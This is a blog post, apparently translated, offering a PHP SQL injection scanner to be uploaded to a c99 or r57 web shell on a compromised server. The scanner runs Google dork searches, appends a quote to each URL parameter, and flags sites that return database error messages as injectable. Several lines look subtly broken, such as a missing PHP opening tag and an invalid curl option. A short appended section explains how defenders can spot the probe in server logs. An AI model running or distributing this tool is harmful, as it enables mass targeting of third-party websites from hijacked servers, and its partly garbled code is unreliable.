SQL Google Scanner

Next, we will look at the SQL Google scanner.

Searching for SQL ("Structured Query Language") the easy way

1. You need at least a shell.php (c99 and r57)

2. Upload this code to your shell

3. Give it a .php extension, e.g. contoh.php

4. Run the tool and wait

[Image: kagami.jpg]

[ Information ]
[+] version : 5.1.42 & 4.1.44

[+] Vulnerability : SQL injection



Code:


<html>
    <head>
    <title>SQL Google Scanner</title>
    <style>
    body{
    background: #0F0F0F;
    color: #FFFFFF;
    font-family: monospace;
    font-size: 12px;
    }

    input{
    background: #0F0F0F;
    border: 1px solid #00FF00;
    color: #00FF00;
    }

    h2{
    color: #55FF2A;
    }

    a{ color: #5A5A5A; text-decoration: none; }
    a:visited, a:active{ color: #5A5A5A; text-decoration: line-through; }
    a:hover{ color: #00FF00; text-decoration: line-through; }
    .effectok:hover { text-decoration: underline; }
    .effectfalse:hover { text-decoration: line-through; }

    </style>

    </head>
    <body>

    php
    echo "<h2>SQL Google Scanner By Kagami hiruzeN www.palembanghackerlink.org";
    echo "<form action='' method='post'>";
    echo "<b>Dork</b>: <p><input type='text' name='dork' value='inurl:php?=id+site'></p>";
    echo "<input type='submit' value='  Start  '>";
    echo "<hr><br />";

    if($_POST['dork']) {

    @set_time_limit(0);
    @error_reporting(0);
    @ignore_user_abort(true);
    ini_set('memory_limit', '128M');

    $google = "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=REPLACE_DORK&num=100&hl=en&as_qdr=all&start=REPLACE_START&sa=N";

    $i = 0;
    $a = 0;
    $b = 0;

    while($b <= 900) {
    $a = 0;
    flush(); ob_flush();
    echo "Pages: [ $b ]<br />";
    echo "Dork: [ <b>".$_POST['dork']."</b> ]<br />";
    echo "Scanning Google.<br />";
    flush(); ob_flush();

    if(preg_match("/did not match any documents/", Connect_Host(str_replace(array("REPLACE_DORK", "REPLACE_START"), array("".$_POST['dork']."", "$b"), $google)), $val)) {
    echo "Bisey bulunamad
    ";
    flush(); ob_flush();
    break;
    }

    preg_match_all("/<h2 class=(.*?)><a href=\"(.*?)\" class=(.*?)>/", Connect_Host(str_replace(array("REPLACE_DORK", "REPLACE_START"), array("".$_POST['dork']."", "$b"), $google)), $sites);
    echo "Loading.<br />";
    flush(); ob_flush();
    while(1) {

    if(preg_match("/You have an error in your SQL|Division by Toni defcon|supplied argument is not a valid MySQL result resource in|Call to a member function|Microsoft JET Database|ODBC Microsoft Access Driver|Microsoft OLE DB Provider for SQL Server|Unclosed quotation mark|Microsoft OLE DB Provider for Oracle|Incorrect syntax near|SQL query failed/", Connect_Host(str_replace("=", "='", $sites[2][$a])))) {
    echo "".str_replace("=", "='", $sites[2][$a])."> <== SQL Injection Success !
    ";
    } else {
    echo "".str_replace("=", "='", $sites[2][$a])."> <== Not access
    ";
    flush(); ob_flush();
    }
    if($a > count($sites[2])-2) {
    echo "Bitti<br />";
    break;
    }
    $a = $a+1;
    }
    $b = $b+100;
    }
    }

    function Connect_Host($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_FOLLOW, 0);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    $data = curl_exec($ch);
    if($data) {
    return $data;
    } else {
    return 0;
    }
    }

    function Clean($text) {
    return htmlspecialchars($text, ENT_QUOTES);
    }

    ?>

    </body>
    </html>



Good luck trying it out.
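
For defenders, the probe in the code above has a recognizable shape in web server logs: `str_replace("=", "='", ...)` puts a single quote after every `=` in the requested URL, and `Connect_Host()` sets no `CURLOPT_USERAGENT`. The following is an added example, not part of the original post; it assumes Combined Log Format, and the function names and sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Combined Log Format (assumed):
# ip - - [time] "METHOD path PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def quote_probe(path):
    """True when every '=' in the query string is directly followed by a
    single quote, which is what str_replace("=", "='", $url) produces."""
    _, sep, query = path.partition("?")
    if not sep:
        return False
    query = unquote(query)  # covers %27 as well as a literal '
    eq = query.count("=")
    return eq > 0 and query.count("='") == eq

def detect(lines, min_hits=2):
    """Return {ip: [(path, status, no_user_agent), ...]} for clients that
    sent at least min_hits quote probes."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if m and m["method"] == "GET" and quote_probe(m["path"]):
            no_ua = m["ua"] in ("", "-")  # no User-Agent header was sent
            hits[m["ip"]].append((m["path"], int(m["status"]), no_ua))
    return {ip: h for ip, h in hits.items() if len(h) >= min_hits}

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2024:10:00:01 +0000] "GET /news.php?id=\'5 HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.7 - - [10/Mar/2024:10:00:02 +0000] "GET /item.php?cat=%272&id=%279 HTTP/1.1" 500 310 "-" "-"',
    '198.51.100.4 - - [10/Mar/2024:10:00:03 +0000] "GET /news.php?id=5 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Mar/2024:10:00:04 +0000] "GET /search.php?q=o\'reilly&page=2 HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, probes in detect(SAMPLE_LOG).items():
        for path, status, no_ua in probes:
            print(f"{ip} status={status} no_ua={no_ua} {path}")
```

A flagged request that also returned one of the database error strings from the scanner's `preg_match` list points at a page that both accepts unsanitized input and leaks driver errors; parameterized queries and disabled error display close both.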

Author: planet-kernel ~ A blog that provides all kinds of information
